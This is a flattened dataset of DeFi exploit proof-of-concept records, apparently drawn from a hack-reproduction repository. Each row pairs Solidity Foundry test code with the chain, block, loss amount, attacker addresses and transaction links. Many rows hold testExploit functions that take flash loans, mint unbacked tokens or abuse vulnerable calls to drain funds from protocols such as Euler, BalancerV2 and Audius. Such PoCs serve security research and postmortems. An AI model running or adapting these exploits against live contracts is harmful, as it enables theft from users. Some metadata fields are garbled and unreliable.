medium
YearnFinance Exploit (2023-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/Phalcon_xyz/status/1645742620897955842 // https://twitter.com/BlockSecTeam/status/1645744655357575170 // https://twitter.com/peckshield/status/16457422969049292...
exploit_poc
Paribus
2023-04
Paribus_exp.sol
flash_loan
427ae67093c0f223
2026-01-07T10:59:16.547629
postmortems
arbitrum
79,308,097
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
3.54
low
Paribus Exploit (2023-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BeosinAlert/status/1648520494516420608 // @TX // https://bscscan.com/tx/0xa21692ffb561767a74a4cbd1b78ad48151d710efab723b1efa5f1e0147caab0a // @Summary // The at...
exploit_poc
OLIFE
2023-04
OLIFE_exp.sol
flash_loan
7db91570b619d1f4
2026-01-07T10:59:16.547678
postmortems
bsc
27,470,678
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
2.91
low
OLIFE Exploit (2023-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1644907207530774530 // https://twitter.com/SlowMist_Team/status/1644936375924584449 // https://twitter.com/AnciliaInc/status/16449254210065203...
exploit_poc
Sushi_Router
2023-04
Sushi_Router_exp.sol
null
5af111ede804de2f
2026-01-07T10:59:16.547733
postmortems
unknown
17,007,841
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
1.72
low
Sushi_Router Exploit (2023-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/CertiKAlert/status/1647530789947469825 // https://twitter.com/BeosinAlert/status/1647552192243728385 // @TX // https://etherscan.io/address/0x2df07c054138bf2934...
exploit_poc
Swapos
2023-04
Swapos_exp.sol
null
6ece621f489c6a74
2026-01-07T10:59:16.547782
postmortems
ethereum
17,057,419
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
0.87
low
Swapos Exploit (2023-04)
false
false
false
false
// SPDX-License-Identifier: MIT pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* @Analysis https://twitter.com/HypernativeLabs/status/1650382589847302145 1. buy on presale 2. sale on pancake v2 @TX https://bscscan.com/tx/0x05eabbb665a5b99490510d0b3f93565f394914294ab4d609895e525b43...
exploit_poc
Axioma
2023-04
Axioma_exp.sol
flash_loan
2f559c48cd1e6bd9
2026-01-07T10:59:16.547820
postmortems
bsc
27,620,321
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { uint256 flashLoanAmount = 32_500_000_000_000_000_000; address wbnb = DVM(wbnb_usdt_b)._BASE_TOKEN_(); DVM(wbnb_usdt_b).flashLoan(flashLoanAmount, 0, address(this), abi.encode(wbnb_usdt_b, wbnb, flashLoanAmount)); }
true
Unknown
4.21
low
Axioma Exploit (2023-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { IDPPAdvanced constant dppAdvanced = IDPPAdvanced(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476); WBNB constant wbnb = WBNB(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173...
exploit_poc
poolz
2023-03
poolz_exp.sol
flash_loan
c68a388183a0080d
2026-01-07T10:59:16.547871
postmortems
unknown
26,475,403
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
false
Unknown
4
low
poolz Exploit (2023-03)
false
false
false
false
pragma solidity ^0.8.13; import "forge-std/Test.sol"; interface IUniswapV2Router02 { function WETH() external pure returns (address); function routerTrade() external pure returns (address); } interface ISafemoon { function uniswapV2Router() external returns (IUniswapV2Router02); function uniswapV2P...
exploit_poc
safeMoon
2023-03
safeMoon_exp.sol
null
0aa30c52a964fa9c
2026-01-07T10:59:16.547959
postmortems
unknown
26,854,757
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testMint() public { vm.rollFork(26_854_757); uint256 originalBalance = sfmoon.balanceOf(address(this)); emit log_named_uint("sfmoon balance before:", originalBalance); assertEq(originalBalance, 0); sfmoon.mint(address(this), sfmoon.balanceOf(sfmoon.bridgeBurnAddress())...
true
Unknown
4.71
low
safeMoon Exploit (2023-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.17; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/HypernativeLabs/status/1633090456157401088 // @TX // https://polygonscan.com/tx/0x6fa6374d43df083679cdab97149af8207cda2471620a06d3f28b115136b8e2c4 // @Summary /...
exploit_poc
Phoenix
2023-03
Phoenix_exp.sol
flash_loan
3c1abbe7dbdc7eff
2026-01-07T10:59:16.548014
postmortems
polygon
40,066,946
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { deal(address(WETH), address(this), 7 * 1e15); MYTOKEN = new SHITCOIN(); MYTOKEN.mint(1_500_000 * 1e18); MYTOKEN.approve(address(Router), type(uint256).max); WETH.approve(address(Router), type(uint256).max); Router.addLiquidity(address(MYTOK...
true
Unknown
5.39
medium
Phoenix Exploit (2023-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @TX // https://bscscan.com/tx/0x9fe19093a62a7037d04617b3ac4fbf5cb2d75d8cb6057e7e1b3c75cbbd5a5adc // Related Events // https://github.com/SunWeb3Sec/DeFiHackLabs/#20230207---fdp---reflection-tok...
exploit_poc
BIGFI
2023-03
BIGFI_exp.sol
flash_loan
f6771c07ccd3f6e0
2026-01-07T10:59:16.548066
postmortems
bsc
26,685,503
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
false
Unknown
2.7
low
BIGFI Exploit (2023-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1636650252844294144 // @TX // https://etherscan.io/tx/0xe3f0d14cfb6076cabdc9057001c3fafe28767a192e88005bc37bd7d385a1116a contract ContractT...
exploit_poc
paraspace
2023-03
paraspace_exp.sol
null
27c1e58db3705c21
2026-01-07T10:59:16.548143
postmortems
ethereum
16,845,558
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
3
low
paraspace Exploit (2023-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/LTV888/status/1640563457094451214?t=OBHfonYm9yYKvMros6Uw_g&s=19 // @Tx // https://bscscan.com/tx/0xdf6252854362c3e96fd086d9c3a5397c303d265649aee0b023176bb49cf00...
exploit_poc
Thena
2023-03
Thena_exp.sol
null
38d854709b4b850a
2026-01-07T10:59:16.548237
postmortems
bsc
26,834,149
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
false
Unknown
1.97
low
Thena Exploit (2023-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/FrankResearcher/status/1635241475989721089 // https://twitter.com/nomorebear/status/1635230621856600064 // https://twitter.com/peckshield/status/163522959459603...
exploit_poc
Euler
2023-03
Euler_exp.sol
flash_loan
7ece83371eb2b977
2026-01-07T10:59:16.548307
postmortems
ethereum
16,817,995
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { uint256 aaveFlashLoanAmount = 30_000_000 * 1e18; address[] memory assets = new address[](1); assets[0] = address(DAI); uint256[] memory amounts = new uint256[](1); amounts[0] = aaveFlashLoanAmount; uint256[] memory modes = new uint256[](1);...
true
Unknown
6
medium
Euler Exploit (2023-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/CertiKAlert/status/1633421908996763648 // @TX // https://bscscan.com/tx/0x0c850f54c1b497c077109b3d2ef13c042bb70f7f697201bcf2a4d0cb95e74271 // https://bscscan.co...
exploit_poc
DKP
2023-03
DKP_exp.sol
flash_loan
349a55e67ecf7790
2026-01-07T10:59:16.548372
postmortems
bsc
26,284,131
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { deal(address(USDT), address(this), 800 * 1e18); exchangeDKP(); DKPToUSDT(); emit log_named_decimal_uint( "Attacker USDT balance after exploit", USDT.balanceOf(address(this)) - 800 * 1e18, USDT.decimals() ); }
true
Unknown
4.91
low
DKP Exploit (2023-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BeosinAlert/status/1639655134232969216 // https://twitter.com/AnciliaInc/status/1639289686937210880 // @TX // https://bscscan.com/tx/0x3b472f87431a52082bae7d852...
exploit_poc
DBW
2023-03
DBW_exp.sol
flash_loan
ebb471d79f7cd17b
2026-01-07T10:59:16.548422
postmortems
bsc
26,745,691
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
4
low
DBW Exploit (2023-03)
false
false
false
false
pragma solidity ^0.8.0; import "forge-std/Test.sol"; import "../interface.sol"; import "../StableMath.sol"; // @KeyInfo - Total Lost : 120M USD // Attacker : https://etherscan.io/address/0x506d1f9efe24f0d47853adca907eb8d89ae03207 // Attack Contract : https://etherscan.io/address/0x54B53503c0e2173Df29f8da735fBd45Ee8aB...
exploit_poc
BalancerV2
2025-11
BalancerV2_exp.sol
null
9cf837fa17a20573
2026-01-07T10:59:16.548538
postmortems
ethereum
23,717,397
120M USD
120,000,000
https://etherscan.io/address/0x506d1f9efe24f0d47853adca907eb8d89ae03207
https://etherscan.io/address/0x54B53503c0e2173Df29f8da735fBd45Ee8aBa30d
null
https://app.blocksec.com/explorer/tx/eth/0x6ed07db1a9fe5c0794d44cd36081d6a6df103fab868cdd75d581e3bd23bc9742
https://x.com/BlockSecTeam/status/1986057732810518640,
https://x.com/BlockSecTeam/status/1986057732810518640,
true
true
false
critical
120M USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of address(beneficiary)", IERC20(weth).balanceOf(address(beneficiary)), 18); emit log_named_decimal_uint("before attack: balance of address(beneficiary)", IERC20(osETH_wETH).balanceOf(address(beneficiary)), 18); emit...
true
120M USD
https://etherscan.io/address/0x506d1f9efe24f0d47853adca907eb8d89ae03207
https://etherscan.io/address/0x54B53503c0e2173Df29f8da735fBd45Ee8aBa30d
https://app.blocksec.com/explorer/tx/eth/0x6ed07db1a9fe5c0794d44cd36081d6a6df103fab868cdd75d581e3bd23bc9742
https://x.com/BlockSecTeam/status/1986057732810518640,
https://x.com/BlockSecTeam/status/1986057732810518640,
$120.00M
8
high
BalancerV2 Exploit (2025-11)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 100K USDT // Attacker : https://etherscan.io/address/0xC0ffeEBABE5D496B2DDE509f9fa189C25cF29671 // Attack Contract : https://etherscan.io/address/0xe08d97e151473a848c3d9ca3f...
exploit_poc
DRLVaultV3
2025-11
DRLVaultV3_exp.sol
flash_loan
7cad7a572dd38816
2026-01-07T10:59:16.548646
postmortems
ethereum
null
100K USDT
100,000
https://etherscan.io/address/0xC0ffeEBABE5D496B2DDE509f9fa189C25cF29671
https://etherscan.io/address/0xe08d97e151473a848c3d9ca3f323cb720472d015
https://etherscan.io/address/0x6A06707ab339BEE00C6663db17DdB422301ff5e8
https://etherscan.io/tx/0xe3eab35b288c086afa9b86a97ab93c7bb61d21b1951a156d2a8f6f5d5715c475
https://blog.verichains.io/p/the-drlvaultv3-exploit-a-slippage
null
true
true
true
high
100K USDT
flash-loan
function testExploit() public balanceLog { bytes memory data = abi.encode(uint8(1)); morpho.flashLoan(USDC_ADDR, FLASHLOAN_USDC, data); }
true
100K USDT
https://etherscan.io/address/0xC0ffeEBABE5D496B2DDE509f9fa189C25cF29671
https://etherscan.io/address/0xe08d97e151473a848c3d9ca3f323cb720472d015
https://etherscan.io/address/0x6A06707ab339BEE00C6663db17DdB422301ff5e8
https://etherscan.io/tx/0xe3eab35b288c086afa9b86a97ab93c7bb61d21b1951a156d2a8f6f5d5715c475
https://blog.verichains.io/p/the-drlvaultv3-exploit-a-slippage
$100.0K
10
high
DRLVaultV3 Exploit (2025-11)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 1M USD // Attacker : https://basescan.org/address/0x6997a8c804642ae2de16d7b8ff09565a5d5658ff // Attack Contract : https://basescan.org/address/0x42ecd332d47c91cbc83b39bd7...
exploit_poc
Moonwell
2025-11
Moonwell_exp.sol
null
9008949c528d5bd2
2026-01-07T10:59:16.548728
postmortems
base
null
1M USD
1,000,000
https://basescan.org/address/0x6997a8c804642ae2de16d7b8ff09565a5d5658ff
https://basescan.org/address/0x42ecd332d47c91cbc83b39bd7f53cebe5e9734bb
null
https://app.blocksec.com/explorer/tx/base/0x190a491c0ef095d5447d6d813dc8e2ec11a5710e189771c24527393a2beb05ac
null
null
true
true
false
critical
1M USD
unknown
function testExploit() public { uint256 wethBefore = IERC20(WETH).balanceOf(address(attacker)); attacker.attack(); uint256 wethAfter = IERC20(WETH).balanceOf(address(attacker)); emit log_named_uint("WETH profit", wethAfter - wethBefore); assertGt(wethAfter, wethBefore); } ...
true
1M USD
https://basescan.org/address/0x6997a8c804642ae2de16d7b8ff09565a5d5658ff
https://basescan.org/address/0x42ecd332d47c91cbc83b39bd7f53cebe5e9734bb
https://app.blocksec.com/explorer/tx/base/0x190a491c0ef095d5447d6d813dc8e2ec11a5710e189771c24527393a2beb05ac
$1.00M
8
high
Moonwell Exploit (2025-11)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : // Attacker : https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7 // Vulnerable Contract : https://etherscan.io/address/0xb983e01458529665007ff7e0cddecd...
exploit_poc
bzx
2020-09
bzx_exp.sol
flash_loan
b5296bae83072ab7
2026-01-07T10:59:16.548794
postmortems
ethereum
null
// Attacker : https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7
0
https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7
null
https://etherscan.io/address/0xb983e01458529665007ff7e0cddecdb74b967eb6
https://etherscan.io/tx/0x85dc2a433fd9eaadaf56fd8156c956da23fc17e5ef83955c7e2c4c37efa20bb5
null
https://x.com/0xCommodity/status/1305354469354303488
true
true
true
low
// Attacker : https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7
flash-loan
function testExploit() public balanceLog { //implement exploit code here vm.deal(address(this), 200 ether); //simulation flashloan loanToken.mintWithEther{value: 200 ether}(address(this)); // transfer token to myself repeatedly for (int256 i = 0; i < 4; i++) { uint25...
true
//
https://etherscan.io/address/0xd1c0f1316140D6bF1a9e2Eea8a227dAD151F69b7
https://etherscan.io/address/0xb983e01458529665007ff7e0cddecdb74b967eb6
https://etherscan.io/tx/0x85dc2a433fd9eaadaf56fd8156c956da23fc17e5ef83955c7e2c4c37efa20bb5
https://x.com/0xCommodity/status/1305354469354303488
Unknown
6.91
medium
bzx Exploit (2020-09)
false
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 704 ETH (~ 1,080,000 US$) // Attacker : 0xa0c7bd318d69424603cbf91e9969870f21b8ab4c // AttackContract : 0xbdbb5945f252bc3466a319cdcc3ee8056bf2e569 // Tx1 initialize + Pro...
exploit_poc
Audius
2022-07
Audius_exp.sol
null
013293e3055b0e87
2026-01-07T10:59:16.548858
postmortems
ethereum
15,201,793
704 ETH (~ 1,080,000 US$)
704
null
null
null
null
https://blog.audius.co/article/audius-governance-takeover-post-mortem-7-23-22
null
true
false
false
low
704 ETH (~ 1,080,000 US$)
unknown
function testExploit() public { console.log("---------- Start from Block %s ----------", block.number); emit log_named_decimal_uint("Attacker ETH Balance", attacker.balance, 18); console.log("-------------------- Tx1 --------------------"); console.log("Modify configurations..."); ...
true
704 ETH (~ 1,080,000 US$)
$704
7
medium
Audius Exploit (2022-07)
true
false
false
true
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface Quixotic { function fillSellOrder( address seller, address contractAddress, uint256 tokenId, uint256 startTime, uint256 expiration, uin...
exploit_poc
Quixotic
2022-07
Quixotic_exp.sol
null
a805cf22d401bfc8
2026-01-07T10:59:16.548928
postmortems
unknown
13,591,383
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { cheat.prank(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5); emit log_named_uint( "Before exploiting, attacker OP Balance:", op.balanceOf(0x0A0805082EA0fc8bfdCc6218a986efda6704eFE5) ); quixotic.fillSellOrder( 0x0A0805082EA0fc8bfdCc6218a...
true
Unknown
3.14
low
Quixotic Exploit (2022-07)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 178 BNB (~ 45,715 US$) // Attacker : 0xd9936EA91a461aA4B727a7e3661bcD6cD257481c // AttackContract : 0xcfb7909b7eb27b71fdc482a2883049351a1749d7 // Txhash : 0x0e970ed84424...
exploit_poc
LPC
2022-07
LPC_exp.sol
flash_loan
818af54b528b3b15
2026-01-07T10:59:16.548977
postmortems
bsc
19,852,596
178 BNB (~ 45,715 US$)
178,000,000,000
null
null
null
null
null
null
true
false
true
critical
178 BNB (~ 45,715 US$)
flash-loan
function testExploit() public { emit log_named_decimal_uint("LPC balance", IERC20(LPC).balanceOf(address(this)), 18); console.log("Get LPC reserve in PancakeSwap..."); (uint256 LPC_reserve,,) = IPancakePair(pancakePair).getReserves(); emit log_named_decimal_uint("\tLPC Reserve", LPC_res...
true
178 BNB (~ 45,715 US$)
$178000.00M
6.36
medium
LPC Exploit (2022-07)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); Flippaz FlippazOne = Flippaz(0xE85A08Cf316F695eBE7c13736C8Cc38a7Cc3e944);...
exploit_poc
FlippazOne
2022-07
FlippazOne_exp.sol
null
d951b44da0018b67
2026-01-07T10:59:16.549029
postmortems
unknown
15,083,765
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { address alice = cheat.addr(1); emit log_named_uint("Before exploiting, ETH balance of FlippazOne Contract:", address(FlippazOne).balance); cheat.prank(msg.sender); FlippazOne.bid{value: 2 ether}(); emit log_named_uint("After bidding, ETH balance of...
true
Unknown
2.59
low
FlippazOne Exploit (2022-07)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Credit: SupremacyCA, the poc rewritten from SupremacyCA. contract ContractTest is Test { IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2); IERC20 doodle = IERC20(0x2F13...
exploit_poc
Omni
2022-07
Omni_exp.sol
flash_loan
575523e5b082d7b7
2026-01-07T10:59:16.549073
postmortems
unknown
15,114,361
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function testExploit() public { payable(address(0)).transfer(address(this).balance); emit log_named_uint("Before exploiting, ETH balance of attacker:", address(this).balance); address[] memory tokens = new address[](1); tokens[0] = address(WETH); uint256[] memory amounts = new u...
true
Unknown
6
medium
Omni Exploit (2022-07)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* @KeyInfo - Total Lost : 25,378 BUSD Attacker Wallet : https://bscscan.com/address/0x00a62eb08868ec6feb23465f61aa963b89e57e57 Attack Contract : https://bscscan.com/address/0x3d817ea746ed...
exploit_poc
SpaceGodzilla
2022-07
SpaceGodzilla_exp.sol
flash_loan
ea602edc5bf4b7cd
2026-01-07T10:59:16.549177
postmortems
bsc
19,523,980
25,378 BUSD
25
null
https://bscscan.com/address/0x3d817ea746edd02c088c4df47c0ece0bd28dcd72
null
https://bscscan.com/tx/0x7f183df11f1a0225b5eb5bb2296b5dc51c0f3570e8cc15f0754de8e6f8b4cca4*/
null
null
true
false
true
low
25,378 BUSD
flash-loan
function testExploit() public { uint256 init_capital = IERC20(USDT).balanceOf(address(this)); emit log_named_decimal_uint("[info] Attacker USDT Balance", init_capital, 18); // ======================================================== ISpaceGodzilla(SpaceGodzilla).swapTokensForOther(69_12...
true
25,378 BUSD
https://bscscan.com/address/0x3d817ea746edd02c088c4df47c0ece0bd28dcd72
https://bscscan.com/tx/0x7f183df11f1a0225b5eb5bb2296b5dc51c0f3570e8cc15f0754de8e6f8b4cca4*/
$25
9
high
SpaceGodzilla Exploit (2022-07)
true
false
true
false